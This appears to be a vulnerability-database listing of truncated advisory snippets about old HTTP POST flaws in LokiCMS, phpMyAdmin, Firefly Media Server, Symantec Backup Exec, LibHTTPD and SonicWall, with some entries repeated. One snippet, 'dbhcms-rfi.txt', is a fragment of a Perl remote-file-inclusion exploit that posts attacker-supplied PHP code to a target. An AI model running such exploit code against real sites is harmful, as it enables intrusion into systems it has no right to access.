LokiCMS admin.php文件绕过安全限制漏洞

BUGTRAQ ID: 29448 LokiCMS是一款简单易用的网络内容管理系统。 LokiCMS的admin.php文件中存在逻辑错误，如果远程攻击者在所提交的HTTP POST请求中设置了LokiACTION和其他参数的话，则无需管理权限就可以设置CMS main settings。 以下是有漏洞的代码段： admin.php Lines:24-42 if isset $POST && isset $POST'LokiACTION' && strlen trim $POST'LokiACTION' 0 // we have an action to do switch trim...

GLSA-200805-02 : phpMyAdmin: Information disclosure

The remote host is affected by the vulnerability described in GLSA-200805-02 phpMyAdmin: Information disclosure Cezary Tomczak reported that an undefined UploadDir variable exposes an information disclosure vulnerability when running on shared hosts. Impact : A remote attacker with CREATE TABLE...

[ GLSA 200805-02 ] phpMyAdmin: Information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200805-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - -...

phpMyAdmin: Information disclosure

Background phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL databases from a web-browser. Description Cezary Tomczak reported that an undefined UploadDir variable exposes an information disclosure vulnerability when running on shared hosts. Impact A remote attack...

phpMyAdmin共享主机远程信息泄露漏洞

BUGTRAQ ID: 28906 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin实现上存在漏洞，如果远程攻击者能够访问共享主机的话，就可以通过向phpMyAdmin发送特制的HTTP POST请求导致泄露敏感信息。 phpMyAdmin 2.11.5.2 phpMyAdmin ---------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Design/Logic Flaw

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

CVE-2008-1924

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

CVE-2008-1924

Unspecified vulnerability in phpMyAdmin before 2.11.5.2, when running on shared hosts, allows remote authenticated users with CREATE table permissions to read arbitrary files via a crafted HTTP POST request, related to use of an undefined UploadDir variable...

File disclosure on shared hosts via a crafted HTTP POST request.

PMASA-2008-3 Announcement-ID: PMASA-2008-3 Date: 2008-04-22 Updated: 2008-04-27 Summary File disclosure on shared hosts via a crafted HTTP POST request. Description We received an advisory from Cezary Tomczak, and we wish to thank him for his work. It is possible to read the contents of any file...

CVE-2008-1771

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

Integer overflow

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

CVE-2008-1771

Integer overflow in the wsgetpostvars function in Firefly Media Server formerly mt-daapd 0.2.4.1 0.9r1696-1.2 on Debian allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via an HTTP POST request with a large Content-Length...

CVE-2008-1771

CVE-2008-1771 describes an integer overflow in ws_getpostvars in mt-daapd (Firefly Media Server) v0.2.4.1 and related builds, triggered by a large HTTP POST Content-Length. This can cause a heap buffer overflow with potential remote code execution, alongside denial of service. Connected advisorie...

dbhcms-rfi.txt

!/usr/bin/perl DBHcms $shellurl = "http://localhost/s.txt"; print " DBHcms ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? "; chomp$code=; $code = s/|new; $ua-timeout10; $ua-envproxy; $response = $ua-post$target,...

Symantec Backup Exec系统还原管理器FileUpload类非授权文件上传漏洞

BUGTRAQ ID: 27487 CVECAN ID: CVE-2008-0457 Symantec Backup Exec是一款全面的数据备份解决方案。 Symantec Backup Exec系统还原管理器的运行在Symantec LiveState Apache Tomcat服务器（TCP 8080端口）上的FileUpload类存在安全漏洞。如果远程攻击者向该服务器提交了恶意的HTTP POST请求的话，就可以向公开可访问的web目录上传JSP脚本，导致执行任意代码。 Symantec Backup Exec System Recovery Manager 7.0.1...

Debian Security Advisory DSA 1380-1 (elinks)

The remote host is missing an update to elinks announced via advisory DSA 1380-1. OpenVAS Vulnerability Test $Id: deb13801.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 1380-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

Debian: Security Advisory (DSA-1380-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2002-2400

Buffer overflow in the httpdProcessRequest function in LibHTTPD 1.2 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a long HTTP POST request...

CVE-2002-2400

CVE-2002-2400 describes a buffer overflow in LibHTTPD 1.2’s httpdProcessRequest function. An attacker can send a long HTTP POST request to trigger a crash and potentially execute arbitrary code, enabling remote compromise without authentication. The issue is documented with a high-severity impact...

CVE-2003-1490

SonicWall Pro running firmware 6.4.0.1 allows remote attackers to cause a denial of service device reset via a long HTTP POST to the internal interface, possibly due to a buffer overflow...